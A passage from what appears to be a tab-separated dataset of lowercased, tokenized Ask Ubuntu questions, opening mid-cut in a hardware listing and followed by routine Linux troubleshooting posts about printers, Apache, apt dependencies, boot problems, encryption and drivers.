512kib capacity : 512kib capabilities : internal write-through unified *-cache:1 description : l1 cache physical id : 9 slot : cpu internal l1 size : 128kib capacity : 128kib capabilities : internal write-through data *-cache:2 description : l3 cache physical id : a slot : cpu internal l3 size : 3mib capacity : 3mib capabilities : internal write-back unified *-memory description : system memory physical id : b slot : system board or motherboard size : 4gib *-bank:0 description : sodimm ddr3 synchronous 1600 mhz ( 0,6 ns ) product : asu1600s11-4g-edeg vendor : kingston physical id : 0 serial : [ removed ] slot : channela-dimm0 size : 4gib width : 64 bits clock : 1600mhz ( 0.6ns ) *-bank:1 description : dimm [ empty ] product : [ empty ] vendor : [ empty ] physical id : 1 serial : [ removed ] slot : channela-dimm1 *-bank:2 description : dimm [ empty ] product : [ empty ] vendor : [ empty ] physical id : 2 serial : [ removed ] slot : channelb-dimm0 *-bank:3 description : dimm [ empty ] product : [ empty ] vendor : [ empty ] physical id : 3 serial : [ removed ] slot : channelb-dimm1 *-cpu description : cpu product : intel ( r ) core ( tm ) i5-3230m cpu @ 2.60ghz vendor : intel corp. physical id : c bus info : cpu @ 0 version : intel ( r ) core ( tm ) i5-3230m cpu @ 2.60ghz slot : socket 0 size : 1200mhz capacity : 3800mhz width : 64 bits clock : 100mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf eagerfpu pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms cpufreq configuration : cores=2 enabledcores=2 threads=4 *-pci description : host bridge product : 3rd gen core processor dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 09 width : 32 bits clock : 33mhz *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:45 memory : f7800000-f7bfffff memory : e0000000-efffffff ioport : f000 ( size=64 ) *-usb:0 description : usb controller product : 7 series/c210 series chipset family usb xhci host controller vendor : intel corporation physical id : 14 bus info : pci @ 0000:00:14.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:40 memory : f7e00000-f7e0ffff *-communication description : communication controller product : 7 series/c210 series chipset family mei controller # 1 vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=mei_me latency=0 resources : irq:44 memory : f7e1a000-f7e1a00f *-usb:1 description : usb controller product : 7 series/c210 series chipset family usb enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:16 memory : f7e18000-f7e183ff *-multimedia description : audio device product : 7 series/c210 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:46 memory : f7e10000-f7e13fff *-pci:0 description : pci bridge product : 7 series/c210 series chipset family pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : c4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 *-pci:1 description : pci bridge product : 7 series/c210 series chipset family pci express root port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : c4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:17 memory : f7d00000-f7dfffff *-network description : wireless interface product : ar9485 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : [ removed ] width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-30-generic firmware=n/a ip= [ removed ] latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : f7d00000-f7d7ffff memory : f7d80000-f7d8ffff *-pci:2 description : pci bridge product : 7 series/c210 series chipset family pci express root port 4 vendor : intel corporation physical id : 1c.3 bus info : pci @ 0000:00:1c.3 version : c4 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:19 ioport : e000 ( size=4096 ) memory : f7c00000-f7cfffff ioport : f0000000 ( size=1048576 ) *-generic description : unassigned class product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list configuration : driver=rtsx_pci latency=0 resources : irq:41 memory : f7c00000-f7c0ffff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:03:00.2 logical name : eth0 version : 0a serial : [ removed ] size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8411-1_0.0.3 06/18/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport : e000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff *-usb:2 description : usb controller product : 7 series/c210 series chipset family usb enhanced host controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:23 memory : f7e17000-f7e173ff *-isa description : isa bridge product : hm76 express chipset lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 04 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : driver=lpc_ich latency=0 resources : irq:0 *-storage description : sata controller product : 7 series chipset family 6-port sata controller [ ahci mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 04 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list configuration : driver=ahci latency=0 resources : irq:43 ioport : f0b0 ( size=8 ) ioport : f0a0 ( size=4 ) ioport : f090 ( size=8 ) ioport : f080 ( size=4 ) ioport : f060 ( size=32 ) memory : f7e16000-f7e167ff *-serial unclaimed description : smbus product : 7 series/c210 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 04 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : f7e15000-f7e150ff ioport : f040 ( size=32 ) *-scsi:0 physical id : 1 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : kingston sh103s3 physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 526a serial : [ removed ] size : 111gib ( 120gb ) capabilities : gpt-1.00 partitioned partitioned : gpt configuration : ansiversion=5 guid=d8069d3f-80ce-456e-8392-d8aa875ac53c sectorsize=512 *-volume:0 description : linux swap volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 version : 1 serial : [ removed ] size : 3904mib capacity : 3904mib capabilities : nofs swap initialized configuration : filesystem=swap pagesize=4095 *-volume:1 description : bios boot partition vendor : efi physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 serial : [ removed ] capacity : 1023kib capabilities : nofs *-volume:2 description : ext4 volume vendor : linux physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 logical name : / version : 1.0 serial : [ removed ] size : 97gib capabilities : journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2014-05-21 14:41:15 filesystem=ext4 lastmountpoint=/ modified=2014-07-15 13:03:38 mount.fstype=ext4 mount.options=rw , noatime , errors=remount-ro , data=ordered mounted=2014-07-15 13:03:38 state=mounted *-volume:3 description : windows fat volume vendor : mkfs.fat physical id : 4 bus info : scsi @ 0:0.0.0,4 logical name : /dev/sda4 logical name : /boot/efi version : fat32 serial : [ removed ] size : 198mib capacity : 209mib capabilities : boot fat initialized configuration : fats=2 filesystem=fat mount.fstype=vfat mount.options=rw , relatime , fmask=0022 , dmask=0022 , codepage=437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro state=mounted *-scsi:1 physical id : 2 logical name : scsi2 capabilities : emulated *-cdrom description : dvd-ram writer product : cddvdw sn-208bb vendor : tsstcorp physical id : 0.0.0 bus info : scsi @ 2:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : as02 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc
487580	ca n't use unebootin or re-install windows	i had windows 7 installed before i install ubuntu , i downloaded ubuntu when i had windows and installed it but i removed all my data by accident and i lost my windows 7 , now i 'm trying to install windows back but i completely fail doing that ! why do you fail ? actually i downloaded windows iso file , i searched online how to install windows using ubuntu and i knew that i have to formate my usb to nfts using gparted , i did , everything is fine now i opened unebootin but i ca n't find my usb , ca n't be detected then error message pop-up saying i have to formate my usb to fat32 , and i know that i ca n't do that to install windows 7 or boot it , but i gave it try and formatted my usb to fat32 , everything went well and it made the usb boot-able i restarted my device and pressed f2 , it showed my usb , i choosed it and pressed enter , it said in the top : unebootin and there 's something in the list called 'default ' and message down saying 'boot or whatever will happen , install or boot after 10 seconds , i wait 10 seconds and it recount again , i press enter and nothing happen just re count the 10 seconds ! and i ca n't find any similar programs like unebootin to do that for me so i 'm stuck on ubuntu only , i wan na install ubuntu as alternate os when i install windows but i 'm just stuck on it now.. i wan na something to make me make windows 7 bootable instead of unebootin because it does n't detect ntfs formatted usb , and i ca n't go with fat32 cuz it does n't work !
487584	apache is not even starting after updating	sudo apache2ctl start [ tue jun 24 17:53:38 2014 ] [ warn ] namevirtualhost *:80 has no virtualhosts httpd ( pid 4924 ) already running after running the above command to start apache2 , i get this error . please someone help me , i am not able to run php on my computer due to this problem .
487587	query mysql return an error incorrect key file for table	i have a site in joomla i hosts locally on an ubuntu server . when a query is executed by mysql , i get the following error : incorrect key file for table '/tmp/ # sql_6ef4_1.myi ' ; here is my configuration : php exécuté surlinux 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 version de la base de données5.5.24-0ubuntu0.12.04.1interclassement de la base de donnéesutf8_general_ci version de php5.3.10-1ubuntu3.11 serveur webapache/2.2.22 ( ubuntu ) serveur web pour interface phpapache2handler version de joomlajoomla ! 3.3.1 stable [ ember ] 11-june-2014 13:30 gmt version de la plateforme joomla ! joomla platform 13.1.0 stable [ curiosity ] 24-apr-2013 00:00 gmt navigateurmozilla/5.0 ( windows nt 6.1 ; wow64 ; rv:30.0 ) gecko/20100101 firefox/30.0 version de mysql 5.5.24 thank you ...
487591	shared printer ( linux server win7 client ) doesnt print pdf	i'av been trying to print pdf files from win7 client . doc files are printted . i adjusted the printer using http : //localhost:631 , enabled the sharing option , and basically i have the same problem described here : pdf not printing on printer shared via cups/samba i reffered to the note that leaded me to windows computers can only print test pages to shared ubuntu printer . nothing help . plz help me , thanks
487594	installing rt5370sta driver for d-link dwa-123 rev b1 in lubuntu 14.04	i have a d-link dwa-123 rev b1 wireless usb dongle and found out that rt5370sta is the driver for it . i tried to install it in vain . in the last step when you have to load the driver , the error message is : fatal : module rt5370sta not found .
487595	resuming a vim session i have accidentally disconnected from	i came across an unusual problem today , i was using vim , had created a new alias in bash , and wanted to try it out . so i ctrl-z , exec bash ( i do this because i do n't like nesting it with bash . and my job has gone . and i now ca n't resume vim . the only option i can think of is to kill vim and start a new session . vim ctrl-z exec bash fg edit : this is independent of using screen/tmux .
487604	failing hard drive	just last week my laptop ( acer aspire ) failed to boot and i even tried using a boot-able cd but it did n't work as well . so i decided to clean all my hard drive thinking that it is the cause of the problem and i am also planning on reformatting it . i tried to install os on it but an error is saying that i can not install os because the hard drive is failing . my question is , how can i fix a failing hard drive using ubuntu ?
487605	ntp : use unprivileged ports	i have had some trouble with ntdpate on ec2 , which was solved by using the -u argument for unprivileged ports : $ sudo ntpdate -u ntp.nasa.gov time-b.nist.gov i know that ntpd is better than a periodic execution of ntpdate via cron , because it features frequency discipline , meaning that the calls to the internet will be less frequent as the drift fix is more accurate . therefore , i would like to run the ntp daemon ( sudo service ntp start ) with unprivileged ports . i have looked at the man ntpd but did not find any reference to that option . any idea how to make ntpd use unprivileged ports ?
487606	bash : update apt-get only if apt cache is older than 10 minutes	i 'm trying , with a script , to test if apt cache is older than 10 minutes old if [ `` ( $ ( date + % s ) - $ ( stat -c % z /var/lib/apt/periodic/update-success-stamp ) ) -ge 600000 '' ] ; then echo true fi but it even when the cache is 1 min old , this return true . what am i doing wrong ?
487608	does hard reboot damage my ubuntu	some times my laptop gets stuck due to excessive usage of ram when i open bulky applications . so if it does not respond i shut down the laptop using the power button . does this damage ubuntu in any way ? can it give rise to security problems or vulnerabilities ?
487610	brother printer dpkg does n't seem to work	i have a brother hl-2240 printer which i 'm trying to make compatible with ubuntu . i followed the instructions for installing their drivers here : http : //support.brother.com/g/s/id/linux/en/instruction_prn1a.html ? c=us_ot & lang=en & prod=hl2240_us_eu & redirect=on # dpkg3 i managed to get as far as checking the install of the dpkg : when i went `` dpkg -l | grep brother '' it said this : ii cupswrapperhl2240 2.0.4-2 i386 brother hl-2240 cups wrapper driver ii printer-driver-ptouch 1.3-8 i386 printer driver brother p-touch label printers so i 've taken that to mean that everything is successfully installed ( please correct me if i 'm wrong ) . however , when i try to print a document in libreoffice , it only prints a blank page . can anybody help with this ?
487613	luks hdd encryption : maximum maximum password length ?	is there any maximum lenght of the passphrase in the hardrive encryption option on ubuntu ( luks ) ?
487614	ca n't install a bunch of packages starting with lib and ending in : i386 [ not actually a duplicate ]	this is definitely not a duplicate . the `` possible duplicate '' i even said i tried in the original question . as for anything else , well , 16 comments and 1 answer that did n't work . it 's clearly not a generic or common solution as the other questions like mine . ian @ ian : ~ $ sudo apt-get install skype [ sudo ] password for ian : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin e : unable to correct problems , you have held broken packages.` i 've tried every solution for every question similar to `` you have held broken packages , '' including those in how do i resolve unmet dependencies ? . i 've purged every ppa , and i 've no idea what to try now . apt-mark showhold gave no output . my sources.list is below . thanks for any help . # deb cdrom : [ ubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140417 ) ] / trusty main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ trusty main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ trusty main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ trusty-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ trusty-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ trusty universe deb-src http : //us.archive.ubuntu.com/ubuntu/ trusty universe deb http : //us.archive.ubuntu.com/ubuntu/ trusty-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ trusty-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ trusty multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ trusty multiverse deb http : //us.archive.ubuntu.com/ubuntu/ trusty-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ trusty-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu trusty-security main restricted deb-src http : //security.ubuntu.com/ubuntu trusty-security main restricted deb http : //security.ubuntu.com/ubuntu trusty-security universe deb-src http : //security.ubuntu.com/ubuntu trusty-security universe deb http : //security.ubuntu.com/ubuntu trusty-security multiverse deb-src http : //security.ubuntu.com/ubuntu trusty-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu trusty partner # deb-src http : //archive.canonical.com/ubuntu trusty partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu trusty main # deb-src http : //extras.ubuntu.com/ubuntu trusty main after entering sudo apt-get install skype-bin skype libqtwebkit4 libqtgui4 , i got this : ian @ ian : ~ $ sudo apt-get install skype-bin skype libqtwebkit4 libqtgui4 libqtgui4 : i386 libqtwebkit4 : i386 libtiff5 : i386 libjbig0 : i386 reading package lists ... done building dependency tree reading state information ... done libqtgui4 is already the newest version . libqtwebkit4 is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libjbig0 : breaks : libjbig0 : i386 ( ! = 2.0-2+deb7u1 ) but 2.0-2ubuntu4.1 is to be installed libjbig0 : i386 : breaks : libjbig0 ( ! = 2.0-2ubuntu4.1 ) but 2.0-2+deb7u1 is to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages .
487619	2nd hdd as a raid 1 mirror on a existing ubuntu server	can any one point me in the right direction as to how i can add a additional hdd as a raid 1 to my existing ubuntu server which works flawlessly . my present set up is that i have 2 hdd on my ubuntu box . 1-160gb hdd which has the ubuntu os ( 12.04lts ) . 2-2tb hdd which has all the data . basically i want to add the another hdd to the box on a raid configuration and i do not want to destroy any data on either hdd 's ... is it possible ? if so how can i go about doing so ?
487621	logout takes too long : how to find the reason ?	logging out the session ( not on shutdown ) takes too long : more than 3 minutes on my netbook . on the process cpu is n't working , seems just waiting . no difference using indicator menu , shortcut key , or the command gnome-session-quit -- logout . on first half of the period some apps , e.g . tomboy notes , are closed . everything else keep working : indicators , launcher , dash , shortcuts , âś . on the second half everything is disappeared except the wallpaper . how can i find out the reason for the problem ? are there any special logs for logout process ?
487623	how to login again after logout ubuntu in trying ubuntu live cd	i try ubuntu 14.04 by using live cd and i logout that and now i ca n't login again because it asks me input username and password . i do n't know what i should enter the usename and password .
487626	how to stop at boot menu for ubuntu minipc	i had a pc running ubuntu 12.10 . have n't used it much after installing os . now i ca n't remember the password . tried to go to single user mode to reset password , unfortunately , when pressing shift during boot , it does n't stop at boot menu . i can see the boot menu in a split of second and it disappeared . this pc does n't have a usb drive , so it 's kind of difficult to run rescue cd . any idea how to stop at boot menu so i can go to single user mode ? thanks in advance .
487627	how to install canon lbp2900b printer in 14.04 lts ? i tried the method for lbp2900 but it didnt work	how can i install canon lbp2900b on ubuntu 14.04 lts ? i tried the method for the installation of lbp2900 , but it did n't work . i tried installing the canoncaptdrv190 as outlined in the community wiki and answers # 1 by alvar . # 2 by sarveshm @ how to install canon lbp2900 printer in ubuntu 12.10 but neither approach worked for me . the printer is switched on and has pages in tray and connected through usb . edit : i followed the ubuntu 13.10 installation method of community help wiki again . now i get this on command 4 ( sudo update-rc.d ccpd defaults ) - update-rc.d : warning /etc/init.d/ccpd missing lsb information update-rc.d : seehttp : //wiki.debian.org/lsbinitscripts system start/stop links for /etc/init.d/ccpd already exist . on seeing captstatusui for lbp2900 , i get - message : no specified printer in the below box i get - check the ( printer asterix , asterix , asterix ( the symbol ) ) of /etc/ccpd.conf i tried your method , elder geek but it did n't work . any more ideas ? regards , andy
487630	xubuntu-possible to change the icons of the application indicators separately ?	i was wondering if it is possible to change how to icons look in the top panel ( application indicators ? ) separately . i am in love with the numix circle icon package , but unfortunately , its application indicators are not the best . i 'd rather use the default icon set in my top panel . is it possible to change those icons separately from the icon pack i am currently using ? i would like to have elementary xfce dark icons on my top panel . thank a lot in advance
487631	751h running ubuntu12.04 dont starve boots to a black screen audio only ?	i have an acer aspire one 751h with 2gb of ram and gma500 graphics . i 'm running ubuntu 12.04 lts 32bit . i have steam loaded on the computer and it runs fine ( slow in full screen ) but fine . i installed do n't starve onto the computer and it starts with a black screen with audio only . i tried about 5 different options in the start up file inside steam ( i.e . right click the game -- preferences ) i tried setting the height to 600 and the width to 800 i tried -gl , -safe and a few others none worked and most started crashing once the sound kicked in . i tried updating the graphics drivers and no improvement . it still starts to a black screen till you hear the audio then it will crash . can anyone point me in the right direction to get this game to run ?
487633	multiple notifications via notify-osd or alternatives	i am searching for a way to display multiple notifications at once . the default app for ubuntu seems to be notify-osd . can this be configured to display multiple notifications ? pnotify is a very cool project bringing this feature in html world . but is there any way to do something like this , natively ?
487634	issues with grep	why does the bottom line output `` 0 '' into the `` ad-results- $ month- $ y '' file ? first grep command fgrep `` $ month $ d $ i : '' $ filetmp > tempoutput grep command to read `` allows '' from tail of tempoutput countallow= ( $ ( tail -- follow=tempoutput | fgrep -c -- line-buffered `` allow '' > > ad-results- $ month- $ y ) ) output : countallow = 0
487635	how do i make an alias that shows only the date ?	exactly as it says . what code should i use to make an alias to show me only the date , and not the time also ?
487636	passphrase failed for encrypted disk after grub menu	i have a dual boot system with windows 7 and kubuntu 13.10 on two separate physical disks ( ssd ) . i have two partitions for ubuntu : an unencrypted `` /boot '' and an encrypted `` / '' . everything was working as expected ( booting on both os ) until i unfortunately unplugged the windows disk and rebooted with the ubuntu disk alone . i had a `` bootmgr is missing '' message . i immediately replugged the windows disk but still had the same message . so i tried to `` boot-repair '' and succeeded in getting the grub menu back to choose between windows and ubuntu again . windows boot is working but when trying to boot on ubuntu the passphrase for the encrypted disk just after the grub menu is consistantly failing . exact message being : `` cryptsetup : cryptsetup failed , bas password or options ? '' when launching a ubuntu installation cd i 'm able to connect to the encrypted disk ( the passphrase is working from dolphin file manager and i can access the files ) so the encrypted volume is still accessible even though i 'm not able to launch ubuntu on it . i guess that when i unplugged the windows disk the bios switched to the ubuntu disk as primary boot device and failed to find the `` bootmgr '' . hence the `` bootmgr is missing '' message . later when i ran `` boot-repair '' it overwrote my initial grub files and i lost some information to decrypt the disk from grub ( ? ) . now i 'm not able to boot on ubuntu anymore . : ( i tried to run `` boot-repair '' a second time with only the ubuntu disk ( mono boot ) to see if any progress but i still have the same issue with the passphrase step . any idea how i can get my system working back ? i browsed the web for hours with no answer to this specific issue .
487637	how to configure dfs name space in ubuntu	hi to all my fellow techies ... i want to know whether it is possible to do dfs namespace in ubuntu ? as with the present system i have a folder shared from my ubuntu where all my users access them via lan . i have a secondary server which runs win2k8r2 with dfs namespace . i think namespace is pretty neat and would be ideal for my workplace . so what i want to know is how can i configure the existing shared folder ( samba ) to be a dfs namespace whereby if there is a failure users will not have a problem accessing their data ... . thanks a bunch for all your input .
487640	unity broken after upgrade from 13.10 to 14.04 ( another one ... )	i just upgraded my notebook ( thinkpad r500 with ati hd3470 graphics ) from 13.10 to 14.04 and since then unity seems to be broken . i can login but afterwards i only see my desktop background and the mouse pointer . nothing else . if i do $ export display=:0 $ unity in another tty . unity seems to start just fine and everything is there and works ( except for the top menu bar ) . i already read all the threads about similiar problems and tried everything posted there ( enable unity plugin in ccsm , resetting compiz and xorg config ... ) . i also tried to search all available log files but could n't find any hint . i do n't really get the problem as starting unity manually as described above seems to work just fine . ***edit*** hmmm ... . must be some config issue i guess . i just activated guest sessions and it turns out it works fine as guest user . any idea where i could search ?
487644	how to increse phpmyadmin upload file size in newest ubuntu	i got a little problem with my test server here . i am not able to change the file size that phpmyadmin accept for importing databases . i have chaged all values i knew like : max_packet_size key_buffer in my.cnf or the upload file size and max_post_size value in every php.ini file i have found on the system . the accepted file size on the import screen still remains at 8,192kib
487648	usb sound card not detected	i have a zalman zm-nc3500 plus , which is a cooling pad with an integrated usb sound card , connected to my ubuntu 14.04 laptop via usb . the cooling pad , which is powered through the usb connection , works fine , but the sound card does not appear to be detected at all : $ lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 13d3:5710 imc networks uvc vga webcam bus 001 device 006 : id 13d3:3362 imc networks bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub the cooling pad also acts as an usb hub , but if i unplug it from the usb port , none of the entries above are removed from the list . what could be the reason the sound card is not detected ? thank you .
487649	web links not active in gmail	i 'm using the installed gmail application , not from a webpage . none of the links to websites within an email , etc are active . is there a setting to correct this ?
487653	how to contribute to ubuntu desktop environment ui , unity as a designer ?	how to contribute to ubuntu desktop environment ui , unity as a designer ? can my ideas be considered ?
487660	where are the log files for psql connection attempts ?	i want to troubleshoot a failed attempt to connect to a remote pg server using psql . i 'd expected to find some log files for psql , but i did n't . is there any other place where such information would be logged ? i 'm running 12.04.2 lts . note : i 've only installed postgresql-client package on this machine .
487661	wordpress could not create directory	i am trying to install a plugin for wordpress on ubuntu 14.04 server but it keeps failing . i assume it is a rights issue because of a directory not being able to create . this is my last ditch effort i have googled and looked all i could but nothing has worked . here is the error it happens on any plugin : downloading install package from https : //downloads.wordpress.org/plugin/syntaxhighlighter.zipâś unpacking the packageâś could not create directory .
487662	how to hiding ubuntu and postgresql versions ?	i 'm seeking to closing some vulnerabilities of my postgresql server that is running over ubuntu 12.04 server , some of these vulnerabilities is an ability of scanners to checking versions of my os and dbms . how can i passing this issue . thank you.. ! !
487663	unable to detect an adb device on usb3.0	when connecting a device using a usb2.0 cable , adb connects to the device properly . when connecting the same device using a usb3.0 cable , adb does n't detect the device . what i notice ( using a lecroy analyzer ) is that after setting the usb configuration , the relevant ( imo ) difference is that there is no request for the string descriptor that has the adb device id . below is the descriptor that is read for usb2.0 but not for usb3.0 transfer ( 10 ) h ( s ) control ( get ) addr ( 16 ) endp ( 0 ) _______| brequest ( get_descriptor ) wvalue ( string type , index 3 ) _______| windex ( language id 0x0409 ) descriptors ( e736c55eec1a ) _______| time stamp ( 5 . 923 353 566 ) in addition , the /tmp/adb.log shows find_usb_device ( ) : endpoints not found is there a limitation that i am unaware of ?
487664	trouble compiling winelib app on x64-64 on trusty	wineg++ -m32 rdwrops.cpp -o2 -ffast-math -fvisibility=hidden -fpic -mtune=generic -msse -wall -ivestige -i/usr/include/alsa -c -o rdwrops.wine.o in file included from rdwrops.cpp:17:0 : /usr/include/zlib.h:34:19 : fatal error : zconf.h : filen eller katalogen finns inte # include `` zconf.h '' ^ compilation terminated . winegcc : g++ failed make : *** [ rdwrops.wine.o ] fel 2 i have installed gcc-multilib , g++-multilib , zlib1g , lib1g-dev and zlib1g : i386 . do i need more packages ? i can not find any other package related to z ( like lib1g-dev : i386 ) in the package manager .
487665	wireless connectivity problem	im a new ubuntu user . i have decided to dual boot ubuntu and windows because i wanted to give ubuntu a try and maybe make it as my primary os . but im currently having problems with my wireless network because it only displays 2 bars and that its very slow ( especially loading 2 or more tabs ) compared to my windows , which does n't have a problem with the wireless conection . need help on this please thanks ! : ) ps . im really liking ubuntu so far , just having this bit of a problem . edit . i have ubuntu 14.04
487666	install mediatomb server on lubuntu	i have old asus netbook with intel 32 bit celeron processor . because of resource constraint , i installed lubuntu 14.04 ( command line only ) version . i tried apt-get install mediatomb , but no luck . ( following is the output . ) reading package lists ... done building dependency tree reading state information ... done package mediatomb is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'mediatomb ' has no installation candidate please help .
487669	boot-up error when starting xubuntu through virtualbox	my xubuntu guest was running fine as a virtualbox guest on my win 7 host ( virtualbox 4.3.10 ) until i changed the path for the shared folder that i was using inside the vb . after at one point having to quit the vb session forcefully , starting it now gives me a boot-up menu with two options : 1 ) `` ubuntu with linux 3.2.0-23-generic '' - if i select this , then it just freezes a black screen with a white cursor . 2 ) `` ubuntu with linux 3.2.0-23-generic ( recovery mode ) '' - if i select this , it then displays , after a few seconds , the message `` failed to spawn friendly-recovery post-stop process : unable to execute : no such file or directory '' i tried removing the shared folder , or rpelacing it back to the old path . also rebooted my pc . still the same . any help ? thanks !
